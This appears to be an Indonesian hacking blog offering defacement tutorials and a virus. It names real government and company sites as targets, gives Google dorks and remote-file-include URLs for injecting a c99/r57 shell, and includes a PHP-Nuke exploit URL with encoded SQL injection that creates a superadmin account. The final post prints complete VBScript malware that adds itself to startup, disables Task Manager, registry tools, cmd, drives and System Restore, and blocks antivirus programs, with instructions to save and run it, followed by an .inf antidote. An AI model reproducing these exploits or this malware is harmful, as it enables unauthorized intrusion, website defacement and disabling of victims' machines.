ada sangkut pautnya dengan misi web tersebut , Biasanya hacker men-deface suatu
halaman web dengan maksud supaya eksistensinya diketahui oleh khalayak ramai.
Mungkin anda pernah dengar atau pernah mengunjungi suatu web yang terkena deface
seperti :

http://www.bandaaceh.go.id
http://www.pertamina.co.id
http://www.transtv.co.id
http://www.setkab.go.id
http://www.pom.go.id
http://www.usni.ac.id

Ternyata apabila kita perhatikan target target tersebut dengan seksama , para target
mempunyai kesamaan yaitu server web tersebut berjalan di Operating System Windows
2000 dan servernya adalah IIS 5.0/6.0.

Mungkin anda beranggapan bahwa deface server server web tersebut adalah hal yang
susah dan perlu waktu yang lama untuk menyusup ke server tersebut , ternyata hal
tersebut adalah mudah semudah copy dan paste , silahkan ikuti langkah langkah berikut ,
dalam hal ini gw menggunakan contoh penggunaan web folder pada Windows xp


1. Buatlah suatu halaman web seperti dibawah ini atau terserah anda dengan
menggunakan tool/software terserah anda seperti Frontpage , Macromedia , Note
pad dan lain lain

2. Beri nama halaman web tersebut dengan index.html / index.asp / default.html /
default.asp atau nama lain tergantung nama file halaman pertama suatu web
terbuka atau nama terserah anda apabila hanya mau menyimpan file tersebut di
suatu web

3. Buka My computer pada desktop dan lihat icon web folder

4. Klik 2 kali pada icon web folder tersebut

5. klik 2 kali pada icon add web folder

6. Isikan URL target di popup yang muncul misalkan target kita adalah
http://www.pertamina.co.id maka isikan URL tersebut

7. klik next lalu finish

8. Klik 2 kali pada folder yang terbentuk dan anda akan melihat isi folder tersebut
dengan file file yang akan tampil pada halaman web apabila kita mengunjungi
web tersebut

9. rubah nama file pembuka web tersebut (biasanya nama file index.html atau
index.asp) dengan nama file lain seperti index_old.asp atau terserah anda ,
biasakan hal ini anda lakukan karena kita tidak bermaksud untuk merusak isi web
milik orang lain , hanya mengingatkan.

10. Copy dan paste-kan halaman web yang anda buat tadi di folder web folder yang
telah kita buat

11. Save di komputer anda.

12. Proses Deface selesai.

Untuk pembelajaran silahkan anda cari web site yang masih vurn dengan menggunakan
google searching ketikan keyword dengan kunci “allinurl:*.asp” atau apabila mau
mencari situs pemerintah ketikan keyword “web: .go.id”
Untuk para administrator web site , download-lah patch bug tersebut untuk menghindari
terjadinya deface yang sangat mudah ini dengan demikian untuk para defacer yang
hendak coba coba deface dengan cara ini dan prosesnya gagal , sudah dipastikan web siteyang hendak anda deface sudah tidak vurn lagi atau sudah di-patch.
Selamat mencoba.

Cara Mudah Deface Remote File Include

Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita..

cd namadirectory = Melihat Suatu directory
ls -al = Melihat Suatu Directory Lebih Dalam lagi
find = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.
curl = mendownload url

[EvilShellInject] = inject rshell / c99 kamu

Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :

Googling ajah, sebelumnya cari dulu RFI di http://www.milw0rm.com

- Site Oneadmin RFI

Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:com
nah sekarang saya kasi contoh pathnya … http://target.com/oneadmin/config.php?path[docroot]=

Contoh :
http://target.com/oneadmin/config.php?path[docroot]=[EvilShellInject]

- PnPhpBB2

Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki…

nah sekarang saya kasi contoh pathnya … http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]

Contoh :
http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]

- Support Ticket

Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka atau kehendaki…
nah sekarang saya kasi contoh pathnya … http://target.com/include/main.php?config[search_disp]=true&include_dir=

Contoh : … http://target.com/include/main.php?config[search_disp]=true&include_dir=[EvilShellInject]

Hehehe Lumayan banyak kan ? Nah selamat mencobanya..
Neh aku kasi beberapa web yang telah berhasil saya Deface..

Nah setelah itu buadlah sebuad file: index.html

Isi dengan:

Hacked by Nama Kamu


Kemudian upload deh file ke directorynya

kemudian buka website yang telah di deface:
http://target.com/lokasipathnya/index.html

Selasa, 02 Februari 2010

deface website sederhana

cara deface paling sederhana langkah langkahnya sebagai berikut
Buka situs google


kemudian ketik keyword nya ==> allinurl:.com/nuke/index.php atau allinurl:.org/nuke/index.php

Nah ..... kalo sudah ketemu targetnya maka langkah selanjutnya adalah :

1. www.target.com/nuke/index.php


2. www.target.com/nuke/index.php ==> index.php tadi dirubah menjadi admin.php


3. Tambahkan bug ini dibelakang situs tadi :

?op=AddAuthor&add_aid=nino&add_name=nno&add_pwd=ninoalone&add_email=nino@linuxmail.org&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox


jadi ketik di url kamu seperti contoh dibawah ini :

www.target.com/nuke/admin.php?op=AddAuthor&add_aid=nino&add_name=nno&add_pwd=ninoalone&add_email=nino@linuxmail.org&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox


4. Kalo berhasil, maka di url/browsing kamu akan muncul : www.target.com/nuke/admin.php?op=mod_author


Kalo gak, berarti situs tsb udah di path ama admin nya.


5. Kalo berhasil, disana kamu di suruh login, masukin id & password kamu tadi. Masih ingat kan ???


id=nino ==> liat point 3 diatas
password=ninoalone ==> liat point 3 diatas


Nah . . . kamu sekarang sudah masuk ke "Administration Menu" situs tsb. Berarti kamu sudah mengusai situs tsb sekarang ! Hehehe...

Sekarang kamu pilih gambar Handphone (dibawahnya ada tulisan Messages), lalu ketik :

title ==>Defaced by NinO
content ==>Hey admin.......find your hole and close it..Greetz to everyone at CuPu²
expiration ==> pilih unlimited trus klik tab add messages yang ada di bawah

Kalo sudah, buka url/browsing baru lalu ketikkan situs target tadi, misal : www.target.com/nuke atau www.target.com/nuke/index.php

kalo nggak ada hasil deface kamu coba klik tab refresh yang ada diatas yg disamping url/browsing kamu.

Jumat, 29 Januari 2010

sampel virus

haloo semua ketemu lagi nih....
ini ada sampel virus... aku dapat dari forum Smadav
silahkan yang mau uji coba yah...
copy dari sini
--------------------------------------------------------------------------------------
'FLyff 666.dll.vbs

set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\User",winpath&"\Flyff 666.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by Flyff 666"
rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\CleanShutdown", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\FaultTime", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCDBurning", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Shutdown_Settings", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\System", "1", "REG_DWORD"
rg.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", "67108863", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoScrSavPage", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCpl", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoClose", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoFileMenu", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoRun", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System Monitoring", "1", "REG_DWORD"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Flyff 666 VM_Community"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", "Saya Adalah Program Jahat yang Mengambil Alih Komputer kalian !! dibuat Oleh Flyff 666"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashAvast.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32kui.exe\Debugger",""
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeCaption", "H4x0r3d By Flyff 666"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeText", "Saya Adalah Program Jahat yang Akan Mengambil Alih Komputer kalian !! System Hasbeen Hacked BY : Flyff 666 From Indonesian Hackers Community"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\LimitSystemRestoreCheckpointing", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\DisableMSI", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableConfig", "1", "REG_DWORD"
------------------------------------------------------------------------------------------------
setelah dicopy dan paste pada notepad kamu
beri nama virus itu terserah kamu terus belakangnya kasih ekstensi .vbs contoh = gilabener.vbs
cara uji cobanya tinggal klik 2x ok selamat mencoba....
uups lupa ini anti dot nya:
----------------------------------------------------------------------------------------------
[Version]
Signature=”$Chicago$”
Provider=Fariskhi
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, “INTERNET EXPLORER”
[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenu
HKCU, Software\Microsoft\Windows\Windows\CurrentVersion\Explorer\Advanced\Hidden", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\CleanShutdown", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\FaultTime", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCDBurning", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Shutdown_Settings", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\System", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", "67108863", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System\NoScrSavPage", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCpl", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoClose", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoFileMenu", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoRun", "1",
HKCU, Software\Policies\Microsoft\Windows\System\DisableCMD", "1", "REG_DWORD"
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeCaption
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeText
HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Systemdir
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff", "1", "REG_DWORD"
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel", "1", "REG_DWORD"
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System Monitoring", "1", "REG_DWORD"
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Flyff 666 VM_Community"
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", "Saya Adalah Program Jahat yang Mengambil Alih Komputer kalian !! dibuat Oleh Flyff 666"
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashAvast.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32kui.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeCaption", "H4x0r3d By Flyff 666"
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeText", "Saya Adalah Program Jahat yang Akan Mengambil Alih Komputer kalian !! System Hasbeen Hacked BY : Flyff 666 From Indonesian Hackers Community"
HKLM, SOFTWARE\Policies\Microsoft\Windows\Installer\LimitSystemRestoreCheckpointing", "1", "REG_DWORD"
HKLM, SOFTWARE\Policies\Microsoft\Windows\Installer\DisableMSI", "1", "REG_DWORD"
HKLM, SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR", "1", "REG_DWORD"
HKLM, SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableConfig", "1", "REG_DWORD"
---------------------------------------------------------------------------------------------

Setelah itu save dengan FILE TYPE : ALL FILES (*.*) dan simpan dengan nama : JATIxremoval.inf. Setelah itu klik kanan file tersebut dan pilih install. Jadi kita buat Virus dan Antidotnya sama-sama dengan Notepad.